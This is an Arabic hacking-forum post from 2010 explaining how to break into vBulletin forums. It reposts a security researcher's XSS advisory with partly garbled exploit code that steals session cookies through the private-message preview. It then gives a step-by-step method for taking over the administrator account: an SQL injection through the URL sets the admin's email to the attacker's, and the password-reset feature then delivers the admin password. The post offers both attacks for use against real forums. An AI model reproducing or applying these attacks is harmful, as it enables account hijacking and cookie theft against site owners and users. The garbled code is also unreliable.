منتدى الوميض العربي
أهلاً وسهلاً على منتدى الوميض العربي
منتدى الوميض العربي
أهلاً وسهلاً على منتدى الوميض العربي
منتدى الوميض العربي
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.


منتدى الوميض العربي
 
الرئيسيةالبوابةأحدث الصورالتسجيلدخولميايهغنوةيوتوب السخاني

منتدى الوميض العربي :: التعليم البرمجة :: تعليم الهكر
 

 أختراق منتديات الvp

اذهب الى الأسفل 
كاتب الموضوعرسالة
الزعيم
Admin
Admin
الزعيم


mms mms : mms
وسام التميز : وسام التميز
الاوسمة : الأدارة
ذكر
الثور
عدد المساهمات : 1169
تاريخ التسجيل : 18/03/2010
العمر : 35
الموقع الموقع : www-aloamed.ace.st
المزاج المزاج : ممتاز

لعبة عالمية
مرئي للجميع مرئي للجميع: 1
أختراق منتديات الvp Empty
مُساهمةموضوع: أختراق منتديات الvp   أختراق منتديات الvp Emptyالخميس نوفمبر 11, 2010 8:29 am
أرجوا عدم استخدام الثغرة على المسلمين وفيما يظر بالإسلام وفيما حرمه الله
لكن هذي كانت على النسخة التجريبية Beta
بالنسبة للثغرة فهي واضحة
وهي تستغل عن طريق الرسائل private.php وتقوم بسرقة الكوكيز ولكن بشرط يكون مفعل كود الهتمل في المنتدى وصاحب الثغرة يذكر انه قد يكون من الضروري تسجيل الدخول لك
طبعا استغلالها عن طريق تحويل الكود لملف html مع تغيير اسم الموقع ومجلد المنتدى
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]



PHP:

------------------------------------------------------------------------------From: Ferruh Mavituna
Subject: VBulletin Preview Message&nbs
p;- XSS Vuln
---------------------------------------
VBulletin Private Message&nbs
p;"Preview
Message" XSS Vulnerability
---------------------------------------
Any kind of XSS att
acks possibility.
-----------------------------------------------------
About VBulletin;
-----------------------------------------------------
PHP Based Popular Forum&
nbsp;Application
Vendor & Demo;
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

---------------------------------------
Vulnerable;
-----------------------------------------------------

vBulletin 3.0.0 Beta 2

vBulletin 2.x
---------------------------------------
Vendor Status;
-----------------------------------------------------
I can not contact v
endor for this issue ! No patch available at&nb
sp;the moment;
-----------------------------------------------------
Solution;
-----------------------------------------------------
HTML Encoding like post&
nbsp;thread preview page;
-----------------------------------------------------
Exploit Code;
-----------------------------------------------------



p;method="post"
name="vbform">





tabindex="2" />

tabindex="3">

accesskey="s" tabindex="4" />

name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" >

checked="checked" />


checked="checked" />

id="cb_disablesmilies" />

";
document.vbform.title.value=xss;
document.vbform.preview.click();

//Set Values and Submit
// You
can write your own JS codes
var xss = "">alert(document.coo
kie)


*You may need login first
Ferruh Mavituna
Web Application Security
Consultant
Freelance Developer & Designer

target="_blank">[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]




طريقة أخرى
1. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي
2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك
3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو
members .
أو العنوان التفصيلي التالي :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
URL =
العنوان المستضيف للمنتدى
مثل4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين
address bar .
سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266
5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى
administrator .
(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))
أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية
6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] rs=$DB_site->query('update+user+set+email='YOUR@EMAIL.HERE'+WH ERE+username='ADMIN'').'
العنوان هذا ستقوم بتغيير الكلمات التالية
URL =
كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER =
أسم المستخدم الخاص بك
VALIDPASS =
كلمة السر الخاصة بك
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] =
البريد الذي سجلت به بالمنتدى
ADMIN =
أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )
7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات refresh .
8. ثم ترجع لصفحة المنتدى الرئيسية
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .
بالطيع ستظهر لك الصفحة التعيسة التي تقول :
أنت قمت بكتابة كلمة سر خاطئة
you typed in the wrong password
9. بكل بساطة أضغط على
نسيت كلمة السر
forgot password
والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني
10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى
ملاحظة هذه الطريقة قديمة وأغلب المنتديات قاموا بإغلاق هذه الثغرة يعني لا تستطيع فعلها إلا مع منتديات اليوم
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://www-aloamed.ace.st
 
أختراق منتديات الvp
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» تعليم فنون أختراق منتديات vp الدرس الأول
» قوى دورة أختراق مواقع ادخل تطلع هكر
» برنامج تهكير منتديات vp
»  شرح بالصور طريقة اختراق منتديات فبليشن vb
» دروس الهكر المنتديات vp لعام 2010 المصدر : منتديات الوميض العربي

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتدى الوميض العربي :: التعليم البرمجة :: تعليم الهكر-
انتقل الى: